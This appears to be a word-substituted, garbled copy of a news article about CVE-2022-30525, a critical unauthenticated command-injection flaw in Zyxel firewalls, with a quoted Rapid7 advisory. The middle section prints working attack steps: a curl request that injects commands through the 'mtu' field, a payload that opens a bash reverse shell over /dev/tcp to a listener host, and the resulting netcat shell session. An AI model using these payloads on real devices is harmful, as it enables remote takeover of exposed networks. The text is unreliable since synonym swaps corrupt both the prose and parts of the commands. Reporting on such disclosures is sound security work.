Zyxel silently patches command-injection vulnerability with 9.8 severity score

{Hardware} producer Zyxel quietly launched an replace fixing a vital vulnerability that provides hackers the flexibility to manage tens of 1000’s of firewall units remotely.

The vulnerability, which permits distant command injection with no authentication required, carries a severity score of 9.8 out of a potential 10. It’s simple to use by sending easy HTTP or HTTPS requests to affected units. The requests permit hackers to ship instructions or open an online shell interface that permits hackers to take care of privileged entry over time.

Excessive-value, simple to weaponize, requires no authentication

The vulnerability impacts a line of firewalls that provide a characteristic referred to as zero-touch provisioning. Zyxel markets the units to be used in small department and company headquarter deployments. The units carry out VPN connectivity, SSL inspection, internet filtering, intrusion safety, and electronic mail safety and supply as much as 5Gbps throughput via the firewall. The Shodan system search service exhibits greater than 16,000 affected units are uncovered to the Web.

The particular units affected are:

The vulnerability is tracked as CVE-2022-30525. Rapid7, the safety agency that found it and privately reported it to Zyxel, mentioned that the VPN sequence of the units additionally helps ZTP, however they’re not susceptible as a result of they don’t embrace different required performance. In an advisory revealed Thursday, Rapid7 researcher Jake Baines wrote:

The affected fashions are susceptible to unauthenticated and distant command injection through the executive HTTP interface. Instructions are executed because the no one consumer. This vulnerability is exploited via the /ztp/cgi-bin/handler URI and is the results of passing unsanitized attacker enter into the os.system technique in lib_wan_settings.py. The susceptible performance is invoked in affiliation with the setWanPortSt command. An attacker can inject arbitrary instructions into the mtu or the information parameter.

Under are examples of (1) curl that causes the firewall to execute a ping to IP deal with 192.168.1.220, adopted by (2) the powershell output of the outcomes, (3) the spawning of a reverse shell and (4) issues a hacker can do with the reverse shell:

1. 1. curl -v --insecure -X POST -H "Content material-Sort: utility/json" -d
      '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
      :"1","vlanid":"5","mtu":"; ping 192.168.1.220;","information":"hello"}'
      https://192.168.1.1/ztp/cgi-bin/handler
      

   2. no one   11040  0.0  0.2  21040  5152 ?        S    Apr10   0:00  _ /usr/native/apache/bin/httpd -f /usr/native/zyxel-gui/httpd.conf -k swish -DSSL
      no one   16052 56.4  0.6  18104 11224 ?        S    06:16   0:02  |   _ /usr/bin/python /usr/native/zyxel-gui/htdocs/ztp/cgi-bin/handler.py
      no one   16055  0.0  0.0   3568  1492 ?        S    06:16   0:00  |       _ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping 192.168.1.220; 5 >/dev/null 2>&1
      no one   16057  0.0  0.0   2152   564 ?        S    06:16   0:00  |           _ ping 192.168.1.220
      

   3. curl -v --insecure -X POST -H "Content material-Sort: utility/json" -d '
      {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":
      "1","vlanid":"5","mtu":"; bash -c "exec bash -i &>/dev/tcp/
      192.168.1.220/1270 <&1;";","information":"hello"}' https://192.168.1.1
      /ztp/cgi-bin/handler
      

   4. albinolobster@ubuntu:~$ nc -lvnp 1270
      Listening on 0.0.0.0 1270
      Connection obtained on 192.168.1.1 37882
      bash: can not set terminal course of group (11037): Inappropriate ioctl for system
      bash: no job management on this shell
      bash-5.1$ id
      id
      uid=99(no one) gid=10003(shadowr) teams=99,10003(shadowr)
      bash-5.1$ uname -a
      uname -a
      Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
      Bash-5.1
      

Rapid7 has developed a module for the Metasploit exploit framework right here that automates the exploitation course of.

Baines mentioned that Rapid7 notified Zyxel of the vulnerability on April 13 and that the 2 events agreed to offer a coordinated disclosure, together with the repair, on June 21. The researcher went on to say that unbeknownst to Rapid7, the {hardware} producer launched a firmware replace on April 28 that quietly mounted the vulnerability. Zyxel solely obtained the CVE quantity on Tuesday, after Rapid7 requested concerning the silent patch, and revealed an advisory on Thursday.

In response to AttackerKB, a useful resource on safety vulnerabilities, CVE-2022-30525 is of excessive worth to menace actors as a result of it’s simple to weaponize, requires no authentication, and might be exploited within the default setup of susceptible units. Rapid7 representatives weren’t accessible to reply primary questions concerning the accuracy of that evaluation.

Directors should manually apply the patch until they’ve modified default settings to permit automated updating. Early indications are that the patch hasn’t been broadly deployed, as a Shodan question for simply one of many susceptible firewalls, the ATP200, confirmed that solely about 25 p.c of uncovered units have been working the most recent firmware.

Vulnerabilities affecting firewalls might be particularly extreme as a result of they sit on the outer fringe of networks the place incoming and outgoing site visitors flows. Many firewalls also can learn information earlier than it’s encrypted. Directors who oversee networks that use these affected units ought to prioritize investigating their publicity to this vulnerability and patch accordingly.